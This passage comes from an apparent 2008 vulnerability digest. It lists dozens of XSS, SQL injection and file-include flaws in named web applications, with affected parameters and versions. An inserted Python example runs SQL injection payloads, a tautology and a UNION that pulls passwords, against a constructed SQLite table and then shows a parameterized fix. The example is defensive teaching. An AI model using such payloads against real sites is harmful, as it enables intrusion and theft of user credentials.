as a Java applet in a browser. The application is exposed to a
security bypass issue that occurs because the application fails to
properly validate the host key when securely connecting to a server.
JSCAPE Secure FTP Applet versions prior to 4.9.0 are affected.
Ref: http://www.securityfocus.com/bid/29882
______________________________________________________________________

08.26.23 CVE: Not Available
Platform: Cross Platform
Title: Perl "rmtree()" Function Local Insecure Permissions
Description: Perl is a multi-platform programming language. Computers
running Perl are exposed to a local issue that occurs when handling
symbolic links. Perl version 5.10.0 is affected.
Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=487319
______________________________________________________________________

08.26.24 CVE: CVE-2008-2662, CVE-2008-2663, CVE-2008-2725,
CVE-2008-2726, CVE-2008-2664
Platform: Cross Platform
Title: Ruby Multiple Unspecified Arbitrary Code Execution
Vulnerabilities
Description: Ruby is exposed to multiple unspecified arbitrary code
execution issues. Kindly refer to the link below for further details.
Ref:
http://www.ruby-lang.org/en/news/2008/06/20/arbitrary-code-execution-vulnerabilities/
______________________________________________________________________

08.26.25 CVE: Not Available
Platform: Cross Platform
Title: Mozilla Firefox Unspecified Arbitrary File Access Weakness
Description: Mozilla Firefox is a web browser application available
for various operating systems. The application is exposed to a
weakness that may allow attackers to gain access to arbitrary files.
Ref: http://xs-sniper.com/blog/
______________________________________________________________________

08.26.26 CVE: CVE-2008-2641
Platform: Cross Platform
Title: Adobe Acrobat and Reader "JavaScript" Method Remote Code
Execution
Description: Adobe Acrobat and Reader are PDF file readers available
for multiple platforms. The applications are exposed to a remote code
execution issue because they fail to sufficiently sanitize
user-supplied input.
Ref: http://www.adobe.com/support/security/bulletins/apsb08-15.html
______________________________________________________________________

08.26.27 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: CGIWrap Error Page Handling Cross-Site Scripting
Description: CGIWrap is a gateway program that allows CGI scripts to
execute in a secure manner. CGIWrap is exposed to a cross-site
scripting issue, which occurs because the application generates error
messages without specifying a charset. This issue can be exploited
only on certain browsers like Internet Explorer. CGIWrap versions
prior to 4.1 are affected.
Ref: http://jvn.jp/en/jp/JVN45389864/index.html
______________________________________________________________________

08.26.28 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: TYPO3 DCD GoogleMap Extension Unspecified Cross-Site Scripting
Description: TYPO3 is an application for creating web portals. The DCD
GoogleMap extension inserts Google Maps into TYPO3 pages. The
extension is exposed to a cross-site scripting issue because it fails
to properly sanitize user-supplied input.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.29 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: vBulletin Moderation Control Panel "redirect" Parameter
Cross-Site Scripting
Description: vBulletin is a PHP-based forum application. The
application is exposed to a cross-site scripting issue in the MCP
(moderation control panel) because it fails to properly sanitize
user-supplied input to the "redirect" parameter of the
"vB3/modcp/index.php" script. vBulletin versions 3.7.1 PL1 and 3.6.10
PL1 are affected.
Ref: http://www.vbulletin.com/forum/showthread.php?postid=1570307
______________________________________________________________________

08.26.30 CVE: CVE-2008-0925
Platform: Web Application - Cross Site Scripting
Title: Novell eDirectory iMonitor Unspecified Cross-Site Scripting
Description: iMonitor is a web-based management interface used for
eDirectory, a directory server package available for multiple
platforms. The application is exposed to a cross-site scripting issue
because it fails to properly sanitize user-supplied input to
unspecified parameters. The issue affects error messages of the HTTP
stack. Novell eDirectory versions prior to and including 8.8.2 and
8.7.3.9 for Solaris, Linux, and Windows 2000/2003 are affected.
Ref:
http://www.novell.com/support/viewContent.do?externalId=3460217&sliceId=1
______________________________________________________________________

08.26.31 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Traindepot Local File Include and Cross-Site Scripting
Vulnerabilities
Description: Traindepot is a PHP-based application for managing a
model train collection. The application is exposed to a local file
include issue and a cross-site scripting issue because it fails to
sanitize user-supplied input. Traindepot version 0.1 is affected.
Ref: http://www.securityfocus.com/bid/29790
______________________________________________________________________

08.26.32 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: TYPO3 JobControl Extension Unspecified Cross-Site Scripting
Description: TYPO3 is an application for creating web portals. The
JobControl extension allows job offers to be posted on TYPO3 web sites.
The JobControl extension for TYPO3 is exposed to a cross-site
scripting issue because the application fails to properly sanitize
user-supplied input. JobControl versions prior to 1.15.1 are affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.33 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: MindTouch DekiWiki Search Cross-Site Scripting
Description: MindTouch DekiWiki is a wiki and intranet collaboration
platform. The application is exposed to a cross-site scripting issue
because it fails to properly sanitize user-supplied input to an
unspecified parameter when performing a search. MindTouch DekiWiki
versions prior to 8.05.1 are affected.
Ref: http://bugs.developer.mindtouch.com/view.php?id=4200
______________________________________________________________________

08.26.34 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: TYPO3 Resource Library Extension Unspecified Cross-Site
Scripting
Description: Resource Library is an extension for the TYPO3 content
manager. The Resource Library extension for TYPO3 is exposed to a
cross-site scripting issue because the application fails to properly
sanitize user-supplied input. Resource Library version 0.10 is
affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.35 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: GL-SH Deaf Forum Cross-Site Scripting Vulnerability and
Arbitrary File Upload
Description: GL-SH Deaf Forum is a web-based forum application. The
application is exposed to two issues because it fails to sanitize
user-supplied input: a cross-site scripting issue in the "search.php"
script and an arbitrary file upload issue in the "upload.php" script.
GL-SH Deaf Forum version 6.5.5 is affected.
Ref: http://www.securityfocus.com/bid/29849
______________________________________________________________________

08.26.36 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: JaxUltraBB Cross-Site Scripting and Local File Include
Vulnerabilities
Description: JaxUltraBB is a bulletin board application. The
application is exposed to multiple input validation issues. A local
file include issue affects the "user" parameter of the
"viewprofile.php" script, and a cross-site scripting issue affects the
"forum" parameter of the "viewforum.php" script. JaxUltraBB version
2.0 is affected.
Ref: http://www.securityfocus.com/bid/29853
______________________________________________________________________

08.26.37 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: PEGames Multiple Cross-Site Scripting Vulnerabilities
Description: PEGames is a CMS for gaming sites. The application is
exposed to multiple cross-site scripting issues that affect the
following parameters of the "template2.php" script: "sitetitle",
"sitenav", "sitemain" and "sitealt".
Ref: http://www.securityfocus.com/bid/29865
______________________________________________________________________

08.26.38 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Chipmunk Blog "membername" Parameter Multiple Cross-Site
Scripting Vulnerabilities
Description: Chipmunk Blog is a PHP-based web-log application. The
application is exposed to multiple cross-site scripting issues because
it fails to sufficiently sanitize user-supplied data to the
"membername" parameter.
Ref: http://www.securityfocus.com/bid/29883
______________________________________________________________________

08.26.39 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: HTML Purifier CSS Multiple Cross-Site Scripting Vulnerabilities
Description: HTML Purifier is an HTML-filtering library intended to
strip script from untrusted markup. It is exposed to multiple
cross-site scripting issues in its handling of CSS, so markup it has
approved may still carry script. HTML Purifier versions prior to 2.1.5
and 3.1.1 are affected.
Ref: http://htmlpurifier.org/news.html
______________________________________________________________________

08.26.40 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Trabajando Multiple Cross-Site Scripting Vulnerabilities
Description: Trabajando is a web application developed in ColdFusion.
The application is exposed to multiple cross-site scripting issues
because it fails to sanitize user-supplied input.
Ref: http://www.securityfocus.com/bid/29887
______________________________________________________________________

08.26.41 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: TinX/cms Cross-Site Scripting and Local File Include
Vulnerabilities
Description: TinX/cms is a content management application. The
application is exposed to a cross-site scripting issue and a local
file include issue because it fails to sanitize user-supplied input.
TinX/cms version 1.1 is affected.
Ref: http://www.securityfocus.com/bid/29907
______________________________________________________________________

08.26.42 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: MM Chat Remote File Include and Multiple Cross-Site Scripting
Vulnerabilities
Description: MM Chat is a PHP-based chat system. The application is
exposed to a remote file include issue and multiple cross-site
scripting issues because it fails to sufficiently sanitize
user-supplied input. MM Chat version 1.5 is affected.
Ref: http://www.securityfocus.com/bid/29910
______________________________________________________________________

08.26.43 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Easy Webstore "index.php" SQL Injection
Description: Easy Webstore is a PHP-based shop application. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "cat_path" parameter
of the "index.php" script before using it in an SQL query. Easy
Webstore version 1.2 is affected.
Ref: http://www.securityfocus.com/bid/29806
______________________________________________________________________

08.26.44 CVE: Not Available
Platform: Web Application - SQL Injection
Title: KEIL Software photokorn "index.php" SQL Injection
Description: photokorn is a PHP-based photo gallery application. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "action" parameter of
the "index.php" script before using it in an SQL query. photokorn
version 1.542 is affected.
Ref: http://www.securityfocus.com/bid/29808
______________________________________________________________________

08.26.45 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Samart-cms "site.php" SQL Injection
Description: samart-cms is a web-based content management system. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "contentsid" parameter
of the "site.php" script before using it in an SQL query. samart-cms
version 2.0 is affected.
Ref: http://www.milw0rm.com/exploits/5862
______________________________________________________________________

08.26.46 CVE: Not Available
Platform: Web Application - SQL Injection
Title: CMS-BRD "index.php" SQL Injection
Description: CMS-BRD is a web-based content management system. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "menuclick" parameter
of the "index.php" script before using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29816
______________________________________________________________________

08.26.47 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 Diocese of Portsmouth Calendar Today Extension SQL
Injection
Description: TYPO3 Diocese of Portsmouth Calendar Today extension is a
calendar extension for TYPO3. The application is exposed to an SQL
injection issue because it fails to sufficiently sanitize unspecified
input before using it in an SQL query. TYPO3 Diocese of Portsmouth
Calendar Today versions 0.0.3 and earlier are affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.48 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 CoolURI Extension SQL Injection
Description: TYPO3 CoolURI extension is a URI modification extension
for TYPO3. The application is exposed to an SQL injection issue
because it fails to sufficiently sanitize unspecified input before
using it in an SQL query. TYPO3 CoolURI versions 1.0.11 and earlier
are affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.49 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 Diocese of Portsmouth Training Courses Extension SQL
Injection
Description: TYPO3 Diocese of Portsmouth Training Courses extension is
a training course extension for TYPO3. The application is exposed to
an SQL injection issue because it fails to sufficiently sanitize
unspecified input before using it in an SQL query. TYPO3 Diocese of
Portsmouth Training Courses version 0.1.1 is affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.50 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 TIMTAB - Social Bookmark Icons Extension SQL Injection
Description: TYPO3 TIMTAB - social bookmark icons extension is a
bookmarking extension for TYPO3. The application is exposed to an SQL
injection issue because it fails to sufficiently sanitize unspecified
input before using it in an SQL query. TYPO3 TIMTAB - social bookmark
icons versions 2.0.4 and earlier are affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.51 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 Fussballtippspiel Extension SQL Injection
Description: The TYPO3 Fussballtippspiel extension is a football
betting-pool (Tippspiel) extension for TYPO3. The application is
exposed to an SQL injection issue because it
fails to sufficiently sanitize unspecified input before using it in an
SQL query. TYPO3 Fussballtippspiel versions 0.1.1 and earlier are
affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.52 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 Download System Extension SQL Injection
Description: TYPO3 Download system is a download management extension
for TYPO3. The application is exposed to an SQL injection issue
because it fails to sufficiently sanitize unspecified input before
using it in an SQL query. TYPO3 Download system version 0.1.4 is
affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.53 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TYPO3 Random Prayer Extension SQL Injection
Description: TYPO3 Random Prayer extension is an extension for TYPO3.
The application is exposed to an SQL injection issue because it fails
to sufficiently sanitize unspecified input before using it in an
SQL query. TYPO3 Random Prayer version 0.0.1 is affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.54 CVE: Not Available
Platform: Web Application - SQL Injection
Title: EroCMS "site" parameter SQL Injection
Description: EroCMS is a web-based content management system. The
application is exposed to an SQL injection issue because it fails to
properly sanitize the "site" parameter of the "index.php" script.
EroCMS versions 1.4 and earlier are affected.
Ref: http://www.securityfocus.com/bid/29781
______________________________________________________________________

08.26.55 CVE: Not Available
Platform: Web Application - SQL Injection
Title: TorrentTrader Classic Edition Multiple SQL Injection
Vulnerabilities
Description: TorrentTrader Classic Edition is a PHP-based torrent
tracker. The application is exposed to multiple SQL injection issues
because it fails to sufficiently sanitize user-supplied input.
TorrentTrader Classic Edition version 1.08 is affected.
Ref: http://www.securityfocus.com/archive/1/493434
______________________________________________________________________

08.26.56 CVE: Not Available
Platform: Web Application - SQL Injection
Title: MyBizz-Classifieds "index.php" SQL Injection
Description: MyBizz-Classifieds is a classified-ads application. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "cat" parameter of the
"index.php" script before using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29798
______________________________________________________________________

08.26.57 CVE: Not Available
Platform: Web Application - SQL Injection
Title: MaxTrade Trade Module SQL Injection
Description: MaxTrade is a web-based content management system. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "categori" parameter
of the "Trade" module before using it in an SQL query. MaxTrade
version 1.3.23 is affected.
Ref: http://www.securityfocus.com/bid/29799
______________________________________________________________________

08.26.58 CVE: Not Available
Platform: Web Application - SQL Injection
Title: BoatScripts Classifieds "type" Parameter SQL Injection
Description: BoatScripts Classifieds is a web-based application
implemented in PHP. The application is exposed to an SQL injection
issue because it fails to sufficiently sanitize user-supplied data to
the "type" parameter of the "index.php" script before using it in an
SQL query.
Ref: http://www.securityfocus.com/bid/29801
______________________________________________________________________

08.26.59 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Carscripts Classifieds "index.php" SQL Injection
Description: Carscripts Classifieds is a classified-ads application.
The application is exposed to an SQL injection issue because it fails
to sufficiently sanitize user-supplied data to the "cat" parameter of
the "index.php" script before using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29803
______________________________________________________________________

08.26.60 CVE: Not Available
Platform: Web Application - SQL Injection
Title: CaupoShop "csc_article_details.php" SQL Injection
Description: CaupoShop is a PHP-based ecommerce application. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "saArticle[ID]"
parameter of the "csc_article_details.php" script before using it in
an SQL query. CaupoShop Classic version 1.3 is affected.
Ref: http://www.securityfocus.com/bid/29834
______________________________________________________________________

08.26.61 CVE: Not Available
Platform: Web Application - SQL Injection
Title: AJ Auction Pro "cate_id" Parameter SQL Injection
Description: AJ Auction Pro is a web-based auction application. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize user-supplied data to the "cate_id" parameter of
the "category.php" script before using it in an SQL query. AJ Auction
Pro Web version 2.0 is affected.
Ref: http://www.securityfocus.com/bid/29839
______________________________________________________________________

08.26.62 CVE: Not Available
Platform: Web Application - SQL Injection
Title: AJ Auction "id" Parameter SQL Injection
Description: AJ Auction is a web-based auction application implemented
in PHP. The application is exposed to an SQL injection issue because
it fails to sufficiently sanitize user-supplied data to the "id"
parameter of the "index.php" script before using it in an SQL query.
AJ Auction version 1.0 is affected.
Ref: http://www.securityfocus.com/bid/29840
______________________________________________________________________

08.26.63 CVE: Not Available
Platform: Web Application - SQL Injection
Title: CiBlog "links-extern.php" SQL Injection
Description: CiBlog is a blog application. The application is exposed
to an SQL injection issue because it fails to sufficiently sanitize
user-supplied data to the "id" parameter of the "links-extern.php"
script before using it in an SQL query. CiBlog version 3.1 is
affected.
Ref: http://www.securityfocus.com/bid/29852
______________________________________________________________________

08.26.64 CVE: Not Available
Platform: Web Application - SQL Injection
Title: emuCMS "index.php" SQL Injection
Description: emuCMS is a web-based content management system. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize input to the "cat_id" parameter of "index.php"
before using it in an SQL query. emuCMS version 0.3 is affected.
Ref: http://www.securityfocus.com/bid/29855
______________________________________________________________________

08.26.65 CVE: Not Available
Platform: Web Application - SQL Injection
Title: PHPAuction "profile.php" SQL Injection
Description: PHPAuction is a web-based auction site. The application
is exposed to an SQL injection issue because it fails to sufficiently
sanitize input to the "auction_id" parameter of "profile.php" before
using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29856
______________________________________________________________________

08.26.66 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Ektron CMS400.NET "ContentRatingGraph.aspx" SQL Injection
Description: CMS400.NET is a web-based content management system. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize input to the "res" parameter of
"ContentRatingGraph.aspx" before using it in an SQL query. CMS400.NET
versions 7.5.2 and earlier are affected.
Ref:
http://www.digitrustgroup.com/advisories/web-application-security-ektron.html
______________________________________________________________________

08.26.67 CVE: Not Available
Platform: Web Application - SQL Injection
Title: CMS Multiple SQL Injection Vulnerabilities
Description: CMS is a web-based content management system. The
application is exposed to multiple SQL injection issues because it
fails to sufficiently sanitize user-supplied input to the following
scripts and parameters: "readarticle.php: article_id" and
"articles.php: cat_id". CMS version 2.1.1 is affected.
Ref: http://www.milw0rm.com/exploits/5881
______________________________________________________________________

08.26.68 CVE: Not Available
Platform: Web Application - SQL Injection
Title: KbLance.com "index.php" SQL Injection
Description: KbLance.com is web-based knowledge base software. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize input to the "cat_id" parameter of "index.php"
before using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29859
______________________________________________________________________

08.26.69 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Online Fantasy Football League Multiple SQL Injection
Vulnerabilities
Description: Online Fantasy Football League is a web-based
application. The application is exposed to multiple SQL injection
issues because it fails to sufficiently sanitize user-supplied input.
Online Fantasy Football League versions 0.2.6 and earlier are
affected.
Ref: http://www.securityfocus.com/bid/29861
______________________________________________________________________

08.26.70 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Scientific Image DataBase "projects.php" SQL Injection
Description: Scientific Image DataBase is a web-based application. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize input to the "id" parameter of "projects.php"
before using it in an SQL query. Scientific Image DataBase versions
0.41 and earlier are affected.
Ref: http://www.securityfocus.com/bid/29862
______________________________________________________________________

08.26.71 CVE: Not Available
Platform: Web Application - SQL Injection
Title: AJ HYIP Acme "news.php" SQL Injection
Description: AJ HYIP Acme is a manager for high-yield investment
program (HYIP) sites. The application is
exposed to an SQL injection issue because it fails to sufficiently
sanitize user-supplied data to the "id" parameter of the "news.php"
script before using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29863
______________________________________________________________________

08.26.72 CVE: Not Available
Platform: Web Application - SQL Injection
Title: phpAuction "item.php" SQL Injection
Description: phpAuction is web-based auction software. The
application is exposed to an SQL injection issue because it fails to
sufficiently sanitize input to the "id" parameter of "item.php" before
using it in an SQL query. phpAuction version 3.2 is affected.
Ref: http://www.securityfocus.com/bid/29864
______________________________________________________________________

08.26.73 CVE: Not Available
Platform: Web Application - SQL Injection
Title: EXP Shop Joomla! "com_expshop" Component SQL Injection
Description: EXP Shop is a component for Joomla! CMS that provides
ecommerce functionality. The application is exposed to an SQL
injection issue because it fails to sufficiently sanitize
user-supplied data to the "catid" parameter of the "com_expshop"
component before using it in an SQL query. EXP Shop version 1.0 is
affected.
Ref: http://www.securityfocus.com/bid/29869
______________________________________________________________________

08.26.74 CVE: Not Available
Platform: Web Application - SQL Injection
Title: PageSquid CMS "index.php" SQL Injection
Description: PageSquid CMS is a web-based content management system.
The application is exposed to an SQL injection issue because it fails
to sufficiently sanitize input to the "page" parameter of "index.php"
before using it in an SQL query. PageSquid CMS version 0.3 Beta is
affected.
Ref: http://www.securityfocus.com/bid/29870
______________________________________________________________________

08.26.75 CVE: Not Available
Platform: Web Application - SQL Injection
Title: sHibby sHop "default.asp" SQL Injection
Description: sHibby sHop is a web-based application implemented in
ASP. The application is exposed to an SQL injection issue because it
fails to sufficiently sanitize input to the "sayfa" parameter of
"default.asp" before using it in an SQL query. sHibby sHop version 2.2
is affected.
Ref: http://www.securityfocus.com/bid/29875
______________________________________________________________________

08.26.76 CVE: Not Available
Platform: Web Application - SQL Injection
Title: CCleague Pro "u" Cookie Parameter SQL Injection
Description: CCleague Pro is a web-based application for managing
sports teams. The application is exposed to an SQL injection issue
because it fails to sufficiently sanitize input to the "u" cookie
parameter before using it in an SQL query. CCleague Pro versions 1.2
and earlier are affected.
Ref: http://www.securityfocus.com/bid/29876
______________________________________________________________________

08.26.77 CVE: Not Available
Platform: Web Application - SQL Injection
Title: IGSuite "formid" Parameter SQL Injection
Description: IGSuite is a groupware application. It is available for
Linux and Windows platforms. The application is exposed to an SQL
injection issue because it fails to sufficiently sanitize input to the
"formid" parameter of "cgi-bin/igsuite" script before using it in an
SQL query. IGSuite version 3.2.4 is affected.
Ref: http://www.securityfocus.com/bid/29879
______________________________________________________________________

08.26.78 CVE: Not Available
Platform: Web Application - SQL Injection
Title: HoMaP-CMS "index.php" SQL Injection
Description: HoMaP-CMS is a content manager. The application is
exposed to an SQL injection issue because it fails to sufficiently
sanitize input to the "go" parameter of the "index.php" script before
using it in an SQL query.
Ref: http://www.securityfocus.com/bid/29897
______________________________________________________________________

08.26.79 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Relative Real Estate Systems "listing_id" Parameter SQL
Injection
Description: Relative Real Estate Systems is a web-based, real estate
application. The application is exposed to an SQL injection issue
because it fails to sufficiently sanitize input to the "listing_id"
parameter of the "index.php" script when the "go" parameter is set to
"listing". Relative Real Estate Systems version 3.0 is affected.
Ref: http://www.securityfocus.com/bid/29915
______________________________________________________________________

08.26.80 CVE: Not Available
Platform: Web Application - SQL Injection
Title: ShareCMS Multiple SQL Injection Vulnerabilities
Description: ShareCMS is a content management system. The application
is exposed to multiple SQL injection issues because it fails to
sufficiently sanitize user-supplied input. ShareCMS version 0.1 Beta
is affected.
Ref: http://www.securityfocus.com/bid/29916
______________________________________________________________________

08.26.81 CVE: Not Available
Platform: Web Application - SQL Injection
Title: DUcalendar "detail.asp" SQL Injection
Description: DUcalendar is an event calendar application implemented
in ASP. The application is exposed to an SQL injection issue because
it fails to sufficiently sanitize user-supplied data to the "iEve"
parameter of the "detail.asp" script. DUcalendar version 1.0 is
affected.
Ref: http://www.securityfocus.com/bid/29919
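The entries from 08.26.43 through 08.26.81 share one defect: a request
value (a GET parameter, or in 08.26.76 a cookie) is concatenated into
an SQL statement. The Python below is an added example, not code from
any of the listed products: it reproduces the pattern against an
in-memory SQLite database with constructed tables, shows the two
payload shapes an attacker uses (a tautology to defeat the filter and
a UNION to pull rows from another table), and contrasts it with an
allow-listed, parameterized query. The table names, rows, the "cat_id"
handling and the cookie helper are this example's own assumptions.

```python
import sqlite3

# Constructed sample data standing in for a shop's catalogue and its user table.
PRODUCTS = [(1, 1, "widget"), (2, 1, "gadget"), (3, 2, "unlisted-sku")]
USERS = [("admin", "s3cr3t-hash")]


def make_db():
    """Build the throwaway database the examples run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, cat_id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def products_vulnerable(conn, cat_id):
    """The bug as listed: the request value is pasted into the statement."""
    sql = "SELECT name FROM products WHERE cat_id = " + cat_id
    return [row[0] for row in conn.execute(sql)]


def is_valid_id(value):
    """Allow-list check: an id is a short run of ASCII digits, nothing else."""
    return value.isascii() and value.isdigit() and len(value) <= 9


def products_safe(conn, cat_id):
    """Reject anything that is not an id, then bind it as a parameter.

    Binding alone already stops the payload from being parsed as SQL;
    the allow-list check turns a silent empty result into a clear error.
    """
    if not is_valid_id(cat_id):
        raise ValueError("cat_id must be numeric")
    sql = "SELECT name FROM products WHERE cat_id = ?"
    return [row[0] for row in conn.execute(sql, (int(cat_id),))]


def id_from_cookie(cookie_header, name):
    """Cookies are request data too (08.26.76); they need the same check."""
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return ""


if __name__ == "__main__":
    db = make_db()
    print(products_vulnerable(db, "1"))                # normal use
    print(products_vulnerable(db, "1 OR 1=1"))         # tautology: every row
    print(products_vulnerable(db, "0 UNION SELECT password FROM users"))
    print(products_safe(db, "1"))
    u = id_from_cookie("u=1 OR 1=1; lang=en", "u")
    print(u, is_valid_id(u))                           # rejected before any query
```

Note that the vulnerable function needs no quote character to be
exploited: the "cat_id" style parameters in these entries are numeric,
so the attacker's text is spliced straight into the expression. When
auditing one of the listed applications, look for the parameter name
from the entry inside a string-built query rather than for quote
handling.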
______________________________________________________________________

08.26.82 CVE: Not Available
Platform: Web Application
Title: nweb2fax Multiple Remote Vulnerabilities
Description: nweb2fax is a PHP-based application for sending faxes.
The application is exposed to multiple remote issues, including
command execution and directory traversal issues, because the
application fails to properly sanitize user-supplied input. nweb2fax
versions 0.2.7 and earlier are affected.
Ref: http://www.securityfocus.com/bid/29804
______________________________________________________________________

08.26.83 CVE: Not Available
Platform: Web Application
Title: Drupal TrailScout Module SQL Injection and HTML Injection
Vulnerabilities
Description: TrailScout is a module for Drupal to display last visited
pages as breadcrumbs. TrailScout is exposed to multiple
input validation issues because it fails to adequately sanitize
user-supplied input. TrailScout versions prior to 5.x-1.4 are
affected.
Ref: http://drupal.org/node/272191
______________________________________________________________________

08.26.84 CVE: Not Available
Platform: Web Application
Title: eLineStudio Site Composer Multiple Input Validation and
Unauthorized Access Vulnerabilities
Description: eLineStudio Site Composer is a content manager. The
application is exposed to multiple input validation issues and an
unauthorized access issue. eLineStudio Site Composer version 2.6 is
affected.
Ref: http://www.securityfocus.com/archive/1/493473
______________________________________________________________________

08.26.85 CVE: Not Available
Platform: Web Application
Title: Academic Web Tools CMS 1.4.2.8 Multiple Input Validation
Vulnerabilities
Description: Academic Web Tools CMS is a content management system.
The application is exposed to multiple input validation issues.
Academic Web Tools CMS version 1.4.2.8 is affected.
Ref: http://www.securityfocus.com/archive/1/493472
______________________________________________________________________

08.26.86 CVE: Not Available
Platform: Web Application
Title: OwnRS "clanek.php" Multiple Input Validation Vulnerabilities
Description: OwnRS is a content manager. The application is exposed to
multiple input validation issues affecting the "id" parameter of the
"clanek.php" script because it fails to adequately sanitize
user-supplied data. OwnRS version 3 beta is affected.
Ref: http://www.securityfocus.com/bid/29818
______________________________________________________________________

08.26.87 CVE: Not Available
Platform: Web Application
Title: Orlando CMS classes "GLOBALS["preloc"]" Parameter Multiple
Remote File Include Vulnerabilities
Description: Orlando CMS classes is a set of PHP classes for building
content managers. The application is exposed to multiple remote file
include issues because it fails to sufficiently sanitize user-supplied
input to the "GLOBALS["preloc"]" parameter of the
"/modules/core/logger/init.php" and "/AJAX/newscat.php" scripts.
Orlando CMS classes version 0.6 is affected.
Ref: http://www.securityfocus.com/bid/29820
______________________________________________________________________

08.26.88 CVE: Not Available
Platform: Web Application
Title: TYPO3 TARGET-E WorldCup Bets Extension Multiple Unspecified
Input Validation Vulnerabilities
Description: The TARGET-E WorldCup Bets is a web-based betting
application extension for TYPO3. The extension is exposed to multiple
input validation issues because it fails to adequately sanitize
user-supplied data. These issues include unspecified cross-site
scripting and SQL injection vulnerabilities. TARGET-E WorldCup Bets
version 2.0.0 is affected.
Ref:
http://typo3.org/teams/security/security-bulletins/typo3-20080619-1/
______________________________________________________________________

08.26.89 CVE: Not Available
Platform: Web Application
Title: WebCalendar "tools/send_reminders.php" Remote File Include
Description: WebCalendar is a web-based calendar application. The
application is exposed to a remote file include issue because it fails
to sufficiently sanitize user-supplied input to the "includedir"
parameter of the "tools/send_reminders.php" script. WebCalendar
version 1.0.4 is affected.
Ref: http://www.securityfocus.com/bid/29783
______________________________________________________________________

08.26.90 CVE: Not Available
Platform: Web Application
Title: ManageEngine OpUtils "hostName" HTML Injection
Description: ManageEngine OpUtils is a web-based network management
application. The application is exposed to an HTML injection issue
because it fails to sanitize user-supplied input to the "hostName"
parameter of the "MainLayout.do" script. ManageEngine OpUtils version
5 is affected.
Ref: http://www.securityfocus.com/bid/29785
______________________________________________________________________

08.26.91 CVE: CVE-2008-2557
Platform: Web Application
Title: CRE Loaded Multiple HTML Injection Vulnerabilities
Description: CRE Loaded is a web-based ecommerce application. The
application is exposed to multiple unspecified HTML injection issues
that affect the "Links" and "Links Submit" pages because it fails to
sufficiently sanitize user-supplied data. CRE Loaded versions 6.2.13.1
and earlier are affected.
Ref: http://oscommerceuniversity.com/lounge/index.php?topic=249.0
______________________________________________________________________

08.26.92 CVE: Not Available
Platform: Web Application
Title: Exero CMS "theme" Parameter Multiple Local File Include
Vulnerabilities
Description: Exero CMS is a content management system. The application
is exposed to local file include issues because it fails to properly
